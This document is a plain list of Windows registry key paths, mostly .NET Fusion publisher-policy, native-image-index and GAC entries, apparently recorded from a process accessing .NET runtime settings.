HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegAsm.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\44a930ad\7ea68a6b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
